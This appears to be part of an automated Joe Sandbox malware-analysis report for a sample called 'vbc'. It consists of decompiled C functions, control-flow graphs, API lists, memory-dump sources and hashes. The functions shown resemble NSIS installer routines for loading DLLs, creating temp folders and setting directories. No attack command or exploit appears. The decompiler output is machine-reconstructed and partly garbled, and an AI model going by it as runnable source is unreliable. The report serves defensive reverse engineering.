                    control_flow_graph 870 406877-406897 GetSystemDirectoryW 871 406899 870->871 872 40689b-40689d 870->872 871->872 873 4068ae-4068b0 872->873 874 40689f-4068a8 872->874 876 4068b1-4068e4 wsprintfW LoadLibraryExW 873->876 874->873 875 4068aa-4068ac 874->875 875->876
                    C-Code - Quality: 100%
                    			E00406877(intOrPtr _a4) {
                    				short _v576;
                    				signed int _t13;
                    				struct HINSTANCE__* _t17;
                    				signed int _t19;
                    				void* _t24;
                    
                    				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                    				if(_t13 > 0x104) {
                    					_t13 = 0;
                    				}
                    				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                    					_t19 = 1;
                    				} else {
                    					_t19 = 0;
                    				}
                    				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                    				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                    				return _t17;
                    			}

                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                    • wsprintfW.USER32 ref: 004068C9
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystemwsprintf
                    • String ID: %s%S.dll$UXTHEME$\
                    • API String ID: 2200240437-1946221925
                    • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                    • Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
                    • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                    • Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 877 405a4b-405a96 CreateDirectoryW 878 405a98-405a9a 877->878 879 405a9c-405aa9 GetLastError 877->879 880 405ac3-405ac5 878->880 879->880 881 405aab-405abf SetFileSecurityW 879->881 881->878 882 405ac1 GetLastError 881->882 882->880
                    C-Code - Quality: 100%
                    			E00405A4B(WCHAR* _a4) {
                    				struct _SECURITY_ATTRIBUTES _v16;
                    				struct _SECURITY_DESCRIPTOR _v36;
                    				int _t22;
                    				long _t23;
                    
                    				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                    				_v36.Owner = 0x4083f8;
                    				_v36.Group = 0x4083f8;
                    				_v36.Sacl = _v36.Sacl & 0x00000000;
                    				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                    				_v16.lpSecurityDescriptor =  &_v36;
                    				_v36.Revision = 1;
                    				_v36.Control = 4;
                    				_v36.Dacl = 0x4083e8;
                    				_v16.nLength = 0xc;
                    				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                    				if(_t22 != 0) {
                    					L1:
                    					return 0;
                    				}
                    				_t23 = GetLastError();
                    				if(_t23 == 0xb7) {
                    					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                    						goto L1;
                    					}
                    					return GetLastError();
                    				}
                    				return _t23;
                    			}

                    APIs
                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                    • GetLastError.KERNEL32 ref: 00405AA2
                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AB7
                    • GetLastError.KERNEL32 ref: 00405AC1
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A71
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 3449924974-4017390910
                    • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                    • Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
                    • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                    • Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 883 734f1817-734f1856 call 734f1bff 887 734f185c-734f1860 883->887 888 734f1976-734f1978 883->888 889 734f1869-734f1876 call 734f2480 887->889 890 734f1862-734f1868 call 734f243e 887->890 895 734f1878-734f187d 889->895 896 734f18a6-734f18ad 889->896 890->889 899 734f187f-734f1880 895->899 900 734f1898-734f189b 895->900 897 734f18af-734f18cb call 734f2655 call 734f1654 call 734f1312 GlobalFree 896->897 898 734f18cd-734f18d1 896->898 921 734f1925-734f1929 897->921 904 734f191e-734f1924 call 734f2655 898->904 905 734f18d3-734f191c call 734f1666 call 734f2655 898->905 902 734f1888-734f1889 call 734f2b98 899->902 903 734f1882-734f1883 899->903 900->896 906 734f189d-734f189e call 734f2e23 900->906 917 734f188e 902->917 910 734f1885-734f1886 903->910 911 734f1890-734f1896 call 734f2810 903->911 904->921 905->921 914 734f18a3 906->914 910->896 910->902 920 734f18a5 911->920 914->920 917->914 920->896 926 734f192b-734f1939 call 734f2618 921->926 927 734f1966-734f196d 921->927 933 734f193b-734f193e 926->933 934 734f1951-734f1958 926->934 927->888 929 734f196f-734f1970 GlobalFree 927->929 929->888 933->934 935 734f1940-734f1948 933->935 934->927 936 734f195a-734f1965 call 734f15dd 934->936 935->934 937 734f194a-734f194b FreeLibrary 935->937 936->927 937->934
                    C-Code - Quality: 88%
                    			E734F1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                    				void _v36;
                    				char _v136;
                    				struct HINSTANCE__* _t37;
                    				intOrPtr _t42;
                    				void* _t48;
                    				void* _t49;
                    				void* _t50;
                    				void* _t54;
                    				intOrPtr _t57;
                    				signed int _t61;
                    				signed int _t63;
                    				void* _t67;
                    				void* _t68;
                    				void* _t72;
                    				void* _t76;
                    
                    				_t76 = __esi;
                    				_t68 = __edi;
                    				_t67 = __edx;
                    				 *0x734f506c = _a8;
                    				 *0x734f5070 = _a16;
                    				 *0x734f5074 = _a12;
                    				 *((intOrPtr*)(_a20 + 0xc))( *0x734f5048, E734F1651);
                    				_push(1); // executed
                    				_t37 = E734F1BFF(); // executed
                    				_t54 = _t37;
                    				if(_t54 == 0) {
                    					L28:
                    					return _t37;
                    				} else {
                    					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                    						E734F243E(_t54);
                    					}
                    					_push(_t54);
                    					E734F2480(_t67);
                    					_t57 =  *((intOrPtr*)(_t54 + 4));
                    					if(_t57 == 0xffffffff) {
                    						L14:
                    						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                    							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                    								_push(_t54);
                    								_t37 = E734F2655();
                    							} else {
                    								_push(_t76);
                    								_push(_t68);
                    								_t61 = 8;
                    								_t13 = _t54 + 0x1018; // 0x1018
                    								memcpy( &_v36, _t13, _t61 << 2);
                    								_t42 = E734F1666(_t54,  &_v136);
                    								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                    								_t18 = _t54 + 0x1018; // 0x1018
                    								_t72 = _t18;
                    								_push(_t54);
                    								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                    								 *_t72 = 4;
                    								E734F2655();
                    								_t63 = 8;
                    								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                    							}
                    						} else {
                    							_push(_t54);
                    							E734F2655();
                    							_t37 = GlobalFree(E734F1312(E734F1654(_t54)));
                    						}
                    						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                    							_t37 = E734F2618(_t54);
                    							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                    								_t37 =  *(_t54 + 0x1008);
                    								if(_t37 != 0) {
                    									_t37 = FreeLibrary(_t37);
                    								}
                    							}
                    							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                    								_t37 = E734F15DD( *0x734f5068);
                    							}
                    						}
                    						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                    							goto L28;
                    						} else {
                    							return GlobalFree(_t54);
                    						}
                    					}
                    					_t48 =  *_t54;
                    					if(_t48 == 0) {
                    						if(_t57 != 1) {
                    							goto L14;
                    						}
                    						E734F2E23(_t54);
                    						L12:
                    						_t54 = _t48;
                    						L13:
                    						goto L14;
                    					}
                    					_t49 = _t48 - 1;
                    					if(_t49 == 0) {
                    						L8:
                    						_t48 = E734F2B98(_t57, _t54); // executed
                    						goto L12;
                    					}
                    					_t50 = _t49 - 1;
                    					if(_t50 == 0) {
                    						E734F2810(_t54);
                    						goto L13;
                    					}
                    					if(_t50 != 1) {
                    						goto L14;
                    					}
                    					goto L8;
                    				}
                    			}

                    APIs
                      • Part of subcall function 734F1BFF: GlobalFree.KERNEL32(?), ref: 734F1E74
                      • Part of subcall function 734F1BFF: GlobalFree.KERNEL32(?), ref: 734F1E79
                      • Part of subcall function 734F1BFF: GlobalFree.KERNEL32(?), ref: 734F1E7E
                    • GlobalFree.KERNEL32(00000000), ref: 734F18C5
                    • FreeLibrary.KERNEL32(?), ref: 734F194B
                    • GlobalFree.KERNEL32(00000000), ref: 734F1970
                      • Part of subcall function 734F243E: GlobalAlloc.KERNEL32(00000040,?), ref: 734F246F
                      • Part of subcall function 734F2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,734F1896,00000000), ref: 734F28E0
                      • Part of subcall function 734F1666: wsprintfW.USER32 ref: 734F1694
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$Free$Alloc$Librarywsprintf
                    • String ID:
                    • API String ID: 3962662361-3916222277
                    • Opcode ID: f4aa0f7c9f0489e4ae492ae03759b1d2c527aa83a6eadd22a49edea80f9966f4
                    • Instruction ID: 901bd6854243c6da76049475d0ff8a2e94d85496216772a9058b0745b2eb723c
                    • Opcode Fuzzy Hash: f4aa0f7c9f0489e4ae492ae03759b1d2c527aa83a6eadd22a49edea80f9966f4
                    • Instruction Fuzzy Hash: 0241B475400347AFEB0D9F24D984F9537BCEF04314F1C4469E91BAA2C6DB788184CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    [Control-flow graph figure (legend: Executed / Not Executed); graph rendering omitted. Entry block 406039-406045; block 406046-40607a calls GetTickCount and GetTempFileNameW.]
                    C-Code - Quality: 100%
                    			E00406039(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                    				intOrPtr _v8;
                    				short _v12;
                    				short _t12;
                    				intOrPtr _t13;
                    				signed int _t14;
                    				WCHAR* _t17;
                    				signed int _t19;
                    				signed short _t23;
                    				WCHAR* _t26;
                    
                    				_t26 = _a4;
                    				_t23 = 0x64;
                    				while(1) {
                    					_t12 =  *L"nsa"; // 0x73006e
                    					_t23 = _t23 - 1;
                    					_v12 = _t12;
                    					_t13 =  *0x40a57c; // 0x61
                    					_v8 = _t13;
                    					_t14 = GetTickCount();
                    					_t19 = 0x1a;
                    					_v8 = _v8 + _t14 % _t19;
                    					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                    					if(_t17 != 0) {
                    						break;
                    					}
                    					if(_t23 != 0) {
                    						continue;
                    					} else {
                    						 *_t26 =  *_t26 & _t23;
                    					}
                    					L4:
                    					return _t17;
                    				}
                    				_t17 = _t26;
                    				goto L4;
                    			}

                    APIs
                    • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406057
                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406072
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-4262883142
                    • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                    • Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
                    • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                    • Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    [Control-flow graph figure (legend: Executed / Not Executed); graph rendering omitted. Entry block 4020d8-4020e4; API nodes in the graph: GetModuleHandleW, LoadLibraryExW, FreeLibrary; the graph also calls 734f1817.]
                    C-Code - Quality: 60%
                    			E004020D8(void* __ebx, void* __eflags) {
                    				struct HINSTANCE__* _t23;
                    				struct HINSTANCE__* _t31;
                    				void* _t32;
                    				WCHAR* _t35;
                    				intOrPtr* _t36;
                    				void* _t37;
                    				void* _t39;
                    
                    				_t32 = __ebx;
                    				asm("sbb eax, 0x7a8b20");
                    				 *(_t39 - 4) = 1;
                    				if(__eflags < 0) {
                    					_push(0xffffffe7);
                    					L15:
                    					E00401423();
                    					L16:
                    					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
                    					return 0;
                    				}
                    				_t35 = E00402DA6(0xfffffff0);
                    				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                    				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                    					L3:
                    					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                    					_t47 = _t23 - _t32;
                    					 *(_t39 + 8) = _t23;
                    					if(_t23 == _t32) {
                    						_push(0xfffffff6);
                    						goto L15;
                    					}
                    					L4:
                    					_t36 = E00406956(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                    					if(_t36 == _t32) {
                    						E0040557C(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                    					} else {
                    						 *(_t39 - 4) = _t32;
                    						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                    							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
                    						} else {
                    							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                    							if( *_t36() != 0) {
                    								 *(_t39 - 4) = 1;
                    							}
                    						}
                    					}
                    					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B69( *(_t39 + 8)) != 0) {
                    						FreeLibrary( *(_t39 + 8));
                    					}
                    					goto L16;
                    				}
                    				_t31 = GetModuleHandleW(_t35); // executed
                    				 *(_t39 + 8) = _t31;
                    				if(_t31 != __ebx) {
                    					goto L4;
                    				}
                    				goto L3;
                    			}

                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                      • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                      • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                      • Part of subcall function 0040557C: lstrcatW.KERNEL32 ref: 004055D7
                      • Part of subcall function 0040557C: SetWindowTextW.USER32 ref: 004055E9
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                    • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402191
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                    • String ID:
                    • API String ID: 334405425-0
                    • Opcode ID: 688cee1cde8ba92b562b3ba80e2bde83ced805693af450c3221be772be186c94
                    • Instruction ID: 444e3b163f15bd358be0b4800c507c2147bc3560cfb58e26f6c7225f93e15a3b
                    • Opcode Fuzzy Hash: 688cee1cde8ba92b562b3ba80e2bde83ced805693af450c3221be772be186c94
                    • Instruction Fuzzy Hash: D621D471904104FACF11AFA5CF48E9E7A71BF48354F20413BF505B91E1DBBD8A929A1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00401B9B(void* __ebx) {
                    				intOrPtr _t8;
                    				void* _t9;
                    				void _t12;
                    				void* _t14;
                    				void* _t22;
                    				void* _t25;
                    				void* _t30;
                    				char* _t32;
                    				void* _t33;
                    				void* _t34;
                    				void* _t37;
                    
                    				_t28 = __ebx;
                    				_t8 =  *((intOrPtr*)(_t37 - 0x28));
                    				_t33 =  *0x40ce28; // 0x9fce50
                    				if(_t8 == __ebx) {
                    					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
                    						_t9 = GlobalAlloc(0x40, 0x804); // executed
                    						_t34 = _t9;
                    						_t5 = _t34 + 4; // 0x4
                    						E00406557(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
                    						_t12 =  *0x40ce28; // 0x9fce50
                    						 *_t34 = _t12;
                    						 *0x40ce28 = _t34;
                    					} else {
                    						if(_t33 == __ebx) {
                    							 *((intOrPtr*)(_t37 - 4)) = 1;
                    						} else {
                    							_t3 = _t33 + 4; // 0x9fce54
                    							E0040651A(_t30, _t3);
                    							_push(_t33);
                    							 *0x40ce28 =  *_t33;
                    							GlobalFree();
                    						}
                    					}
                    					goto L15;
                    				} else {
                    					while(1) {
                    						_t8 = _t8 - 1;
                    						if(_t33 == _t28) {
                    							break;
                    						}
                    						_t33 =  *_t33;
                    						if(_t8 != _t28) {
                    							continue;
                    						} else {
                    							if(_t33 == _t28) {
                    								break;
                    							} else {
                    								_t36 = _t33 + 4;
                    								_t32 = L"Call";
                    								E0040651A(_t32, _t33 + 4);
                    								_t22 =  *0x40ce28; // 0x9fce50
                    								E0040651A(_t36, _t22 + 4);
                    								_t25 =  *0x40ce28; // 0x9fce50
                    								_push(_t32);
                    								_push(_t25 + 4);
                    								E0040651A();
                    								L15:
                    								 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t37 - 4));
                    								_t14 = 0;
                    							}
                    						}
                    						goto L17;
                    					}
                    					_push(0x200010);
                    					_push(E00406557(_t28, _t30, _t33, _t28, 0xffffffe8));
                    					E00405B7A();
                    					_t14 = 0x7fffffff;
                    				}
                    				L17:
                    				return _t14;
                    			}

                    APIs
                    • GlobalFree.KERNEL32(009FCE50), ref: 00401C0B
                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                      • Part of subcall function 00406557: lstrcatW.KERNEL32 ref: 004066FC
                      • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Global$AllocFreelstrcatlstrlen
                    • String ID: Call
                    • API String ID: 3292104215-1824292864
                    • Opcode ID: b890c972c8bf46be985b92796f08af71a41c27e005c5bd4be6b96cad305d66d6
                    • Instruction ID: 26dbd5a77eb58e605bfe28f9d4715249581a5b1b61a00b50ad00dbbd18183bd9
                    • Opcode Fuzzy Hash: b890c972c8bf46be985b92796f08af71a41c27e005c5bd4be6b96cad305d66d6
                    • Instruction Fuzzy Hash: CE219373904210EBD721AFA4DEC4A9E73A4EB08328715453BF542F72D0D6BCA8418B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E004015C1(short __ebx, void* __eflags) {
                    				void* _t17;
                    				int _t23;
                    				void* _t25;
                    				signed char _t26;
                    				short _t28;
                    				short _t31;
                    				short* _t34;
                    				void* _t36;
                    
                    				_t28 = __ebx;
                    				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                    				_t17 = E00405E94(_t16);
                    				_t32 = _t17;
                    				if(_t17 != __ebx) {
                    					do {
                    						_t34 = E00405E16(_t32, 0x5c);
                    						_t31 =  *_t34;
                    						 *_t34 = _t28;
                    						if(_t31 != _t28) {
                    							L5:
                    							_t25 = E00405AC8( *(_t36 + 8));
                    						} else {
                    							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                    							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AE5(_t42) == 0) {
                    								goto L5;
                    							} else {
                    								_t25 = E00405A4B( *(_t36 + 8)); // executed
                    							}
                    						}
                    						if(_t25 != _t28) {
                    							if(_t25 != 0xb7) {
                    								L9:
                    								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                    							} else {
                    								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                    								if((_t26 & 0x00000010) == 0) {
                    									goto L9;
                    								}
                    							}
                    						}
                    						 *_t34 = _t31;
                    						_t32 = _t34 + 2;
                    					} while (_t31 != _t28);
                    				}
                    				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                    					_push(0xfffffff5);
                    					E00401423();
                    				} else {
                    					E00401423(0xffffffe6);
                    					E0040651A(0x7b4000,  *(_t36 + 8));
                    					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                    					if(_t23 == 0) {
                    						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                    					}
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t36 - 4));
                    				return 0;
                    			}

                    0x004015c1
                    0x004015c9
                    0x004015cc
                    0x004015d1
                    0x004015d5
                    0x004015d7
                    0x004015df
                    0x004015e1
                    0x004015e4
                    0x004015ea
                    0x00401604
                    0x00401607
                    0x004015ec
                    0x004015ec
                    0x004015ef
                    0x00000000
                    0x004015fa
                    0x004015fd
                    0x004015fd
                    0x004015ef
                    0x0040160e
                    0x00401615
                    0x00401624
                    0x00401624
                    0x00401617
                    0x0040161a
                    0x00401622
                    0x00000000
                    0x00000000
                    0x00401622
                    0x00401615
                    0x00401627
                    0x0040162b
                    0x0040162c
                    0x004015d7
                    0x00401634
                    0x00401663
                    0x004022f1
                    0x00401636
                    0x00401638
                    0x00401645
                    0x0040164d
                    0x00401655
                    0x0040165b
                    0x0040165b
                    0x00401655
                    0x00402c2d
                    0x00402c39

                    APIs
                      • Part of subcall function 00405E94: CharNextW.USER32(?), ref: 00405EA2
                      • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                      • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                      • Part of subcall function 00405A4B: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                    • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
